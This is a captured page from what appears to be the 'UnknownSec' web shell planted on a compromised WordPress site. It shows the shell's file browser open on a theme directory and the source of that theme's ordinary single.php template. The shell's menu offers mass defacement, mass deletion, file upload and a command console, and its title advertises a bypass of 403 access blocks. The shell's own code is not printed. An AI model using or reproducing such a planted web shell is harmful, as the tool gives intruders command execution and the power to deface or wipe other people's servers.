shell bypass 403
UnknownSec Shell
:
/
home
/
akwariom
/
www
/
wp-content
/
themes
/
esplanade
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
single.php
<?php get_header(); ?> <div id="container"> <?php if( 'sidebar-content-sidebar' == esplanade_get_option( 'layout' ) ) : ?> <div class="content-sidebar-wrap"> <?php endif; ?> <section id="content"> <?php if( have_posts() ) : the_post(); ?> <article <?php post_class(); ?> id="post-<?php the_ID(); ?>"> <div class="entry"> <?php if( esplanade_get_option( 'breadcrumbs' ) ) : ?> <div id="location"> <?php esplanade_breadcrumbs(); ?> </div><!-- #location --> <?php endif; ?> <?php esplanade_post_nav(); ?> <header class="entry-header"> <<?php esplanade_title_tag( 'post' ); ?> class="entry-title"><?php the_title(); ?></<?php esplanade_title_tag( 'post' ); ?>> <aside class="entry-meta"> <?php the_time( get_option( 'date_format' ) ); ?> | <?php _e( 'Filed under', 'esplanade' ); ?>: <?php the_category( ', ' ) ?> <?php the_tags( __( 'and tagged with: ', 'esplanade' ), ', ', '' ); ?> <?php edit_post_link( __( 'Edit', 'esplanade' ), ' | ', '' ); ?> </aside><!-- .entry-meta --> </header><!-- .entry-header --> <div class="entry-content"> <?php if( has_post_format( 'audio' ) ) : ?> <p><?php esplanade_post_audio(); ?></p> <?php elseif( has_post_format( 'video' ) ) : ?> <p><?php esplanade_post_video(); ?></p> <?php endif; ?> <?php the_content(); ?> <div class="clear"></div> </div><!-- .entry-content --> <footer class="entry-utility"> <?php wp_link_pages( array( 'before' => '<p class="post-pagination">' . __( 'Pages:', 'esplanade' ), 'after' => '</p>' ) ); ?> <?php esplanade_social_bookmarks(); ?> <?php esplanade_post_author(); ?> <?php esplanade_post_nav(); ?> </footer><!-- .entry-utility --> </div><!-- .entry --> <?php comments_template(); ?> </article><!-- .post --> <?php else : ?> <?php esplanade_404(); ?> <?php endif; ?> </section><!-- #content --> <?php if( 'sidebar-content-sidebar' == esplanade_get_option( 'layout' ) ) : ?> <?php get_sidebar( 'left' ); ?> </div><!-- #content-sidebar-wrap --> <?php get_sidebar( 'right' ); ?> <?php elseif( ( 'no-sidebars' != esplanade_get_option( 'layout' ) ) && ( 'full-width' != esplanade_get_option( 'layout' ) ) ) : ?> <?php get_sidebar(); ?> <?php endif; ?> </div><!-- #container --> <?php get_footer(); ?>
© 2026 UnknownSec